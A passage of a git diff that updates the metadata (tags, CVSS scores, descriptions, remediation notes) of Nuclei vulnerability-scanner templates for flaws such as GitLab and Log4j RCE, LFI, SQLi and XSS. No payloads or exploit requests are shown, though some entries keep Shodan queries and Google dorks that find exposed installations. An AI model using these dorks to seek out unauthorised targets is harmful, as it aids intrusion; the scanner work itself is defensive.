b/config/nuclei-templates/misconfiguration/zabbix-dashboards-access.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: zabbix,unauth + tags: edb,packetstorm,zabbix,unauth requests: - method: GET diff --git a/config/nuclei-templates/network/cowrie-honeypot-detect.yaml b/config/nuclei-templates/network/cowrie-honeypot-detect.yaml index 77c09b5ca..56a629d83 100644 --- a/config/nuclei-templates/network/cowrie-honeypot-detect.yaml +++ b/config/nuclei-templates/network/cowrie-honeypot-detect.yaml @@ -10,7 +10,7 @@ info: - https://web.archive.org/web/20170826075224/https://morris.sc/detecting-kippo-ssh-honeypots/ - /~https://github.com/blazeinfosec/detect-kippo-cowrie/blob/master/detectKippoCowrie.py - /~https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/detect_kippo.rb - tags: network,ssh,honeypot + tags: network,ssh,honeypot,msf network: - host: diff --git a/config/nuclei-templates/network/openssh-detection.yaml b/config/nuclei-templates/network/openssh-detection.yaml index 9da8374ab..f84c2c87a 100644 --- a/config/nuclei-templates/network/openssh-detection.yaml +++ b/config/nuclei-templates/network/openssh-detection.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - http://seclists.org/fulldisclosure/2016/Jul/51 - tags: network,ssh,openssh + tags: seclists,network,ssh,openssh description: | OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. diff --git a/config/nuclei-templates/takeovers/gitbook-takeover.yaml b/config/nuclei-templates/takeovers/gitbook-takeover.yaml index a8f26b9f0..09f8d9062 100644 --- a/config/nuclei-templates/takeovers/gitbook-takeover.yaml +++ b/config/nuclei-templates/takeovers/gitbook-takeover.yaml @@ -7,7 +7,7 @@ info: reference: - /~https://github.com/EdOverflow/can-i-take-over-xyz/issues/259 - https://hackerone.com/reports/223625 - tags: takeover,gitbook + tags: takeover,gitbook,hackerone requests: - method: GET diff --git a/config/nuclei-templates/technologies/detect-sentry.yaml b/config/nuclei-templates/technologies/detect-sentry.yaml index 115080507..c5a3c6c86 100644 --- a/config/nuclei-templates/technologies/detect-sentry.yaml +++ b/config/nuclei-templates/technologies/detect-sentry.yaml @@ -7,7 +7,7 @@ info: reference: - https://hackerone.com/reports/374737 - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en - tags: ssrf,sentry,tech + tags: ssrf,sentry,tech,hackerone requests: - method: GET diff --git a/config/nuclei-templates/technologies/projectsend-detect.yaml b/config/nuclei-templates/technologies/projectsend-detect.yaml index 8801efa2f..3a1ae7c8b 100644 --- a/config/nuclei-templates/technologies/projectsend-detect.yaml +++ b/config/nuclei-templates/technologies/projectsend-detect.yaml @@ -9,7 +9,7 @@ info: - /~https://github.com/projectsend/projectsend metadata: google-dork: intext:Provided by ProjectSend - tags: tech,projectsend + tags: tech,projectsend,edb requests: - method: GET diff --git a/config/nuclei-templates/technologies/synology-web-station.yaml b/config/nuclei-templates/technologies/synology-web-station.yaml index ec14264ba..b8e15e430 100644 --- a/config/nuclei-templates/technologies/synology-web-station.yaml +++ b/config/nuclei-templates/technologies/synology-web-station.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7125 - tags: tech,synology + tags: tech,synology,edb requests: - method: GET diff --git a/config/nuclei-templates/technologies/tileserver-gl.yaml b/config/nuclei-templates/technologies/tileserver-gl.yaml index eb77c2172..e9a72e948 100644 --- a/config/nuclei-templates/technologies/tileserver-gl.yaml +++ b/config/nuclei-templates/technologies/tileserver-gl.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: http.title:"TileServer GL - Server for vector and raster maps with GL styles" google-dork: intitle:"TileServer GL - Server for vector and raster maps with GL styles" - tags: tech,tileserver + tags: tech,tileserver,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/config/nuclei-templates/vulnerabilities/cisco/cisco-vmanage-log4j.yaml index f1e37e5f8..045cc7304 100644 --- a/config/nuclei-templates/vulnerabilities/cisco/cisco-vmanage-log4j.yaml +++ b/config/nuclei-templates/vulnerabilities/cisco/cisco-vmanage-log4j.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true shodan-query: title:"vManage" - tags: cve,cve2021,rce,jndi,log4j,cisco + tags: log4j,cisco,tenable,cve,cve2021,rce,jndi requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/concrete/concrete-xss.yaml b/config/nuclei-templates/vulnerabilities/concrete/concrete-xss.yaml index b045006c1..a853d9d66 100644 --- a/config/nuclei-templates/vulnerabilities/concrete/concrete-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/concrete/concrete-xss.yaml @@ -9,7 +9,7 @@ info: - https://hackerone.com/reports/643442 - /~https://github.com/concrete5/concrete5/pull/7999 - https://twitter.com/JacksonHHax/status/1389222207805661187 - tags: concrete,xss,cms,unauth + tags: hackerone,concrete,xss,cms,unauth requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/drupal/drupal-avatar-xss.yaml b/config/nuclei-templates/vulnerabilities/drupal/drupal-avatar-xss.yaml index 18bf3b04f..95dd7d44b 100644 --- a/config/nuclei-templates/vulnerabilities/drupal/drupal-avatar-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/drupal/drupal-avatar-xss.yaml @@ -8,7 +8,7 @@ info: This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. reference: - https://www.exploit-db.com/exploits/50841 - tags: xss,drupal + tags: xss,drupal,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml b/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml index 9927ff0e6..a7d06b2a3 100644 --- a/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: fastjson,rce,deserialization,oast + tags: fastjson,rce,deserialization,oast,vulhub requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml b/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml index e1848983c..baffecd9c 100644 --- a/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: fastjson,rce,deserialization,oast + tags: rce,deserialization,oast,vulhub,fastjson requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/config/nuclei-templates/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml index 7d42755be..e0c92c8f0 100644 --- a/config/nuclei-templates/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml +++ b/config/nuclei-templates/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://hackerone.com/reports/406387 - tags: ssrf,generic,xmlrpc + tags: xmlrpc,hackerone,ssrf,generic requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/gitlab/gitlab-rce.yaml b/config/nuclei-templates/vulnerabilities/gitlab/gitlab-rce.yaml index dade1377d..115c90af6 100644 --- a/config/nuclei-templates/vulnerabilities/gitlab/gitlab-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/gitlab/gitlab-rce.yaml @@ -4,21 +4,20 @@ info: name: GitLab CE/EE Unauthenticated RCE Using ExifTool author: pdteam severity: critical - description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and - 13.10-13.10.2. + description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2. reference: - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://hackerone.com/reports/1154542 - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 + remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: CWE-20 - remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher. metadata: shodan-query: http.title:"GitLab" - tags: cve,cve2021,gitlab,rce,oast,intrusive + tags: oast,intrusive,hackerone,cve,cve2021,gitlab,rce,kev requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml b/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml index 34b950700..bae2c8ef9 100644 --- a/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml +++ b/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"gnuboard5" - tags: gnuboard,xss + tags: gnuboard,xss,huntr requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml b/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml index 545d3c782..31c2d511d 100644 --- a/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"gnuboard5" - tags: xss,gnuboard,gnuboard5 + tags: xss,gnuboard,gnuboard5,huntr requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml b/config/nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml index 3e7d311de..dcaec3552 100644 --- a/config/nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: ibm,lfi,matrix,printer + tags: matrix,printer,edb,ibm,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/jenkins/jenkins-script.yaml b/config/nuclei-templates/vulnerabilities/jenkins/jenkins-script.yaml index 13f6e04ce..bac70353e 100644 --- a/config/nuclei-templates/vulnerabilities/jenkins/jenkins-script.yaml +++ b/config/nuclei-templates/vulnerabilities/jenkins/jenkins-script.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: jenkins,rce,devops + tags: devops,hackerone,jenkins,rce requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/config/nuclei-templates/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 88cea915b..edcf653e9 100644 --- a/config/nuclei-templates/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/config/nuclei-templates/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -7,7 +7,7 @@ info: description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. reference: - https://hackerone.com/reports/221833 - tags: jenkins + tags: jenkins,hackerone requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml b/config/nuclei-templates/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml index ffae9984d..faf2cbb11 100644 --- a/config/nuclei-templates/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-score: 8.6 cwe-id: CWE-22 remediation: Upgrade to a supported version. - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/config/nuclei-templates/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index 8611d3d41..e9d17adb8 100644 --- a/config/nuclei-templates/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -4,21 +4,23 @@ info: name: Ivanti MobileIron Log4J JNDI RCE author: meme-lord severity: critical - description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker - who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. reference: - /~https://github.com/advisories/GHSA-jfh8-c2jp-5v3q - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/ - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available. classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 cve-id: CVE-2021-44228 - remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available. + cwe-id: CWE-917 metadata: - verified: true shodan-query: http.html:"MobileIron" - tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron + verified: "true" + tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml b/config/nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml index 7138e6ad1..97d602bd2 100644 --- a/config/nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C cvss-score: 7.5 cwe-id: CWE-22 - tags: moodle,lfi + tags: moodle,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml index b1dbdbf43..3a642b46b 100644 --- a/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml @@ -7,7 +7,7 @@ info: description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - tags: netsweeper,redirect + tags: netsweeper,redirect,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml b/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml index 18892a310..8b85901e9 100644 --- a/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml +++ b/config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - tags: netsweeper,xss + tags: xss,packetstorm,netsweeper requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/oracle/oracle-siebel-xss.yaml b/config/nuclei-templates/vulnerabilities/oracle/oracle-siebel-xss.yaml index 161b89486..223a83559 100644 --- a/config/nuclei-templates/vulnerabilities/oracle/oracle-siebel-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/oracle/oracle-siebel-xss.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 remediation: Upgrade to Siebel Loyalty version 8.2 or later. - tags: xss,oracle,siebel + tags: xss,oracle,siebel,packetstorm,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/oscommerce/oscommerce-rce.yaml b/config/nuclei-templates/vulnerabilities/oscommerce/oscommerce-rce.yaml index 8e7f71725..4875f89f3 100644 --- a/config/nuclei-templates/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -8,7 +8,7 @@ info: command's executed output reference: - https://www.exploit-db.com/exploits/50128 - tags: rce,oscommerce + tags: rce,oscommerce,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/alumni-management-sqli.yaml b/config/nuclei-templates/vulnerabilities/other/alumni-management-sqli.yaml index 5741efd72..2e2bd0ec7 100644 --- a/config/nuclei-templates/vulnerabilities/other/alumni-management-sqli.yaml +++ b/config/nuclei-templates/vulnerabilities/other/alumni-management-sqli.yaml @@ -8,7 +8,7 @@ info: Alumni Management System Admin Login page can be bypassed with a simple SQLi to the username parameter. reference: - https://www.exploit-db.com/exploits/48883 - tags: alumni,sqli,auth-bypass,cms + tags: sqli,auth-bypass,cms,edb,alumni requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/avada-xss.yaml b/config/nuclei-templates/vulnerabilities/other/avada-xss.yaml index 6c0001f1f..feaf360da 100644 --- a/config/nuclei-templates/vulnerabilities/other/avada-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/avada-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/ - tags: xss,wp,wordpress,wp-theme,avada + tags: xss,wp,wordpress,wp-theme,avada,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/bems-api-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/bems-api-lfi.yaml index 895ae2376..f451d4fc6 100644 --- a/config/nuclei-templates/vulnerabilities/other/bems-api-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/bems-api-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi + tags: lfi,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/config/nuclei-templates/vulnerabilities/other/beward-ipcamera-disclosure.yaml index 7914b6da9..1f6c76464 100644 --- a/config/nuclei-templates/vulnerabilities/other/beward-ipcamera-disclosure.yaml +++ b/config/nuclei-templates/vulnerabilities/other/beward-ipcamera-disclosure.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: iot,camera,disclosure + tags: iot,camera,disclosure,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/bitrix-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/other/bitrix-open-redirect.yaml index 3ddf1a643..d717cc9e1 100644 --- a/config/nuclei-templates/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/other/bitrix-open-redirect.yaml @@ -7,7 +7,7 @@ info: description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. reference: - https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html - tags: redirect,bitrix + tags: redirect,bitrix,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/bullwark-momentum-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/bullwark-momentum-lfi.yaml index 09ef6eefd..b870a1d76 100644 --- a/config/nuclei-templates/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -16,7 +16,7 @@ info: version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-query: Bullwark fofa-query: "Bullwark" - tags: bullwark,lfi + tags: lfi,edb,bullwark requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml b/config/nuclei-templates/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml index 85d93953d..8c81ff641 100644 --- a/config/nuclei-templates/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml +++ b/config/nuclei-templates/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: carel,lfi,traversal,unauth,bacnet,unauth + tags: carel,lfi,traversal,unauth,bacnet requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml b/config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml index 9ac8cdf66..5d0099096 100644 --- a/config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true shodan-query: http.html:"Car Rental Management System" - tags: xss,cms,authenticated + tags: xss,cms,authenticated,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/config/nuclei-templates/vulnerabilities/other/caucho-resin-info-disclosure.yaml index 11dea3cf9..dc7fea182 100644 --- a/config/nuclei-templates/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/config/nuclei-templates/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/exploits/27888 - tags: exposure,resin,caucho + tags: exposure,resin,caucho,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml b/config/nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml index e90f33c43..1a7ee86ee 100644 --- a/config/nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml @@ -13,14 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-1472 - https://nvd.nist.gov/vuln/detail/CVE-2021-1473 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2021-1472,CVE-2021-1473 - cwe-id: CWE-119 + cve-id: CVE-2021-1472 + cwe-id: CWE-287 metadata: - verified: true shodan-query: http.html:"Cisco rv340" - tags: cve,cve2021,cisco,rce,auth-bypass,injection + verified: "true" + tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/config/nuclei-templates/vulnerabilities/other/commax-biometric-auth-bypass.yaml index 11e74ddce..a83ef1582 100644 --- a/config/nuclei-templates/vulnerabilities/other/commax-biometric-auth-bypass.yaml +++ b/config/nuclei-templates/vulnerabilities/other/commax-biometric-auth-bypass.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.exploit-db.com/exploits/50206 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php - tags: commax,auth-bypass + tags: commax,auth-bypass,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/comtrend-password-exposure.yaml b/config/nuclei-templates/vulnerabilities/other/comtrend-password-exposure.yaml index da04291a2..85ea879e9 100644 --- a/config/nuclei-templates/vulnerabilities/other/comtrend-password-exposure.yaml +++ b/config/nuclei-templates/vulnerabilities/other/comtrend-password-exposure.yaml @@ -7,7 +7,7 @@ info: description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint. reference: - https://www.exploit-db.com/exploits/16275 - tags: router,exposure,iot,rce + tags: router,exposure,iot,rce,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/cvms-sqli.yaml b/config/nuclei-templates/vulnerabilities/other/cvms-sqli.yaml index 4193d34ea..01f4dfb26 100644 --- a/config/nuclei-templates/vulnerabilities/other/cvms-sqli.yaml +++ b/config/nuclei-templates/vulnerabilities/other/cvms-sqli.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/exploits/48884 metadata: verified: true - tags: cvms,sqli,auth-bypass,cms + tags: cvms,sqli,auth-bypass,cms,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml b/config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml index b4b05aa25..ed7a95435 100644 --- a/config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/exploits/6369 metadata: verified: true - tags: devalcms,xss,cms + tags: devalcms,xss,cms,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/dicoogle-pacs-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/dicoogle-pacs-lfi.yaml index 51e356b70..b31e82cb5 100644 --- a/config/nuclei-templates/vulnerabilities/other/dicoogle-pacs-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/dicoogle-pacs-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: windows,lfi,dicoogle + tags: edb,windows,lfi,dicoogle requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/config/nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml index 07bced9d0..02edfa151 100644 --- a/config/nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml +++ b/config/nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-45420 metadata: google-dork: inurl:"xweb500.cgi" - tags: lfw,iot,dixell,xweb500 + tags: lfw,iot,dixell,xweb500,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/eibiz-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/eibiz-lfi.yaml index 75f25bfd0..99707662e 100644 --- a/config/nuclei-templates/vulnerabilities/other/eibiz-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/eibiz-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: windows,lfi,eibiz + tags: lfi,eibiz,packetstorm,windows requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/ems-sqli.yaml b/config/nuclei-templates/vulnerabilities/other/ems-sqli.yaml index 21b31e8ca..f642b72dc 100644 --- a/config/nuclei-templates/vulnerabilities/other/ems-sqli.yaml +++ b/config/nuclei-templates/vulnerabilities/other/ems-sqli.yaml @@ -11,7 +11,7 @@ info: - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip metadata: verified: true - tags: ems,sqli,cms,auth-bypass + tags: ems,sqli,cms,auth-bypass,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 1f7a9f545..5e2bb3147 100644 --- a/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: geowebserver,lfi + tags: packetstorm,geowebserver,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-xss.yaml b/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-xss.yaml index ed9ed1315..bf990d4e5 100644 --- a/config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ 